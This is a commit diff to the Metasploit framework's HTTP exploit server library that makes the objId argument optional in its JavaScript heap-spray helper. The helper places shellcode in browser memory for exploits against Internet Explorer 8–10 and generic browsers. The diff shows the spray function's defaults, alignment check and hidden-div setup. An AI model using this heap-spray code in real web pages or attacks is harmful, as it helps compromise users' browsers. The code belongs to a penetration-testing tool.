Make objId optional

Author: sinn3r

lib/msf/core/exploit/http/server.rb

@@ -799,9 +799,9 @@ def js_base64
 	#
 	# The "sprayHeap" JavaScript function supports the following arguments:
 	#   shellcode     => The shellcode to spray in JavaScript.
-	#   objId         => The ID for a <div> HTML tag.
 	#   browser       => The type of browser to target for precise block size, such as:
 	#                    'ie8', 'ie9', 'ie10', and 'generic'.
+	#   objId         => Optional. The ID for a <div> HTML tag.
 	#   offset        => Optional. Number of bytes to align the shellcode, default: 0x104
 	#   heapBlockSize => Optional. Allocation size, default: 0x40000
 	#   maxAllocs     => Optional. Number of allocation calls, default: 0x250
@@ -817,7 +817,9 @@ def js_base64
 	#   </script>
 	#
 	def js_property_spray
-		js = %Q|function sprayHeap( oArg ) {
+		js = %Q|
+		var div_container;
+		function sprayHeap( oArg ) {
 
 			shellcode     = oArg.shellcode;
 			browser       = oArg.browser;
@@ -827,15 +829,19 @@ def js_property_spray
 			objId         = oArg.objId;
 
 			if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
-			if (objId         == undefined)  { throw "Missing argument: objId"; }
 			if (offset        == undefined)  { offset        = 0x104; }
 			if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
 			if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
 			if (browser       == undefined)  { browser       = 'generic'; }
 
 			if (offset > 0x800) { throw "Bad alignment"; }
 
-			var div_container = document.getElementById(objId);
+			div_container = document.getElementById(objId);
+
+			if (div_container == null) {
+				div_container = document.createElement("div");
+			}
+
 			div_container.style.cssText = "display:none";
 			var data;
 			junk = unescape("%u2020%u2020");